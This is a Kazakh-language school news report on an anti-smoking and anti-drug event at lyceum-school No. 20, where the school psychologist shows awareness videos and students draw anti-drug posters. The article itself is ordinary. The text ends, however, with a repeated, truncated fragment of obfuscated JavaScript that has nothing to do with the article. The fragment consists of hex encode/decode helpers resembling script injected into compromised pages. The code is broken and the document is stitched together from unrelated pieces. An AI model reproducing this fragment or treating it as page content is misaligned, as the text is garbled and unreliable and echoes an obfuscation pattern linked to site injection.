Бүгін № 20 лицей-ектебінде «Адам ағзасына зиянды заттарға жол жоқ!» атты блиц-турнир өтті. Оның мақсаты: оқушыларға шылым шегудің тыныс алу мүшелеріне зиянды әсерлерін ашу, оның салдарынан туатын аурулар туралы оқушы білімін арттыру.
Тазалыққа, лас істерден аулақ болуға, тән сұлулығы мен жан сұлулығын қатар сақтауға тәрбиелеу. Балалар арасындағы әр түрлі жаман әдеттердің таралуына тосқауын қойып, жаман әдеттерден сақтандыру. Зиянды адам ағзасына тигізетін әсерін, зиянды жақтарын аша отырып, өз денсаулығын сақтауға оқушыларда жауапкершілігін ояту.
Мектеп психологы осы тақырып аясында дайындалған «Ішімдіктің зияны», «Есірткі туралы ақиқат пен жалған», «Темекі мен насыбай қауіптілігі» атты бейнероликтер көрсетіп, оқушыларға ой тастады. Нәтижесінде көрермен оқушылар өз ой-пікірлерін ортаға салып, бір-біріне деген өз кеңестерімен бөлісті. Осы тақырыпты тереңдей түскен оқушылар «Біз нашақорлыққа қарсымыз»! ұранымен өз ойларын антипропоганда ретінде сурет салу арқылы білдірді. Өткізілген іс-шаралар мен көрсетілген бейнероликтерден оқушылар көп әсер алды деп ойлаймыз.
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e)/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(),p=function()for(var e=0;e // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e)/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(),p=function()for(var e=0;e